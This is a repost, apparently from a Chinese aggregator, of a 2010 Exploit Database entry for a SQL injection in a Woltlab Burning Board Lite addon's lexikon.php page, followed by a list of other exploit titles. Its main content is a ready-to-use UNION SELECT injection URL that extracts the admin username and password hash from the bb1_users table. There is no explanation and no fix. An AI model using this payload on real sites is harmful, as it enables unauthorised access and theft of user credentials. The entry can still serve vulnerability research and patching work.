Woltlab Burning Board Lite Addon – ‘lexikon.php’ SQL Injection

Exploit Database
12 阅读

作者： n3w7u

日期： 2010-03-21
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/11829/

.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.

 ~ Woltlab Burning Board Lite Addon (lexikon.php) SQL Injection Vulnerability~

.-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.
 
[+] Autor: n3w7u
 
[+] Vulnerabilities [ SQL Injection ]

[+] Page: http://www.mywbb.info/board/thread.php?threadid=125185

[+] Language: [ PHP ]
 
[+] Version: 2.2

[+] Date: 21.03.2010
 

.-=--=--=--=--=--=--=--=--=--=--=-.
 
[+] Vulnerability
 
lexikon.php?action=show&id=
 
 
[+] Exploitable
 
http://[host]/[path]/lexikon.php?action=show&id=null+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8+from+bb1_users+where+userid=1--

last Exploits
Woltlab Burning Board Lite Addon – ‘lexikon.php’ SQL Injection的更多信息

FlexCMS 3.2.1 – Persistent Cross-Site Scripting：
Netgear DGN2200B – Multiple Vulnerabilities：
WordPress Plugin CP Multi View Event Calendar 1.1.7 – SQL Injection：
sit! support incident tracker 3.64 – Multiple Vulnerabilities：
Netgear WNDR3400 N600 Wireless Dual Band – Multiple Vulnerabilities：
Joomla! Component AWDwall 1.5.4 – Local File Inclusion / SQL Injection：
HP Network Automation 9.10 – SQL Injection：
WordPress Theme Kakao – ‘ID’ SQL Injection：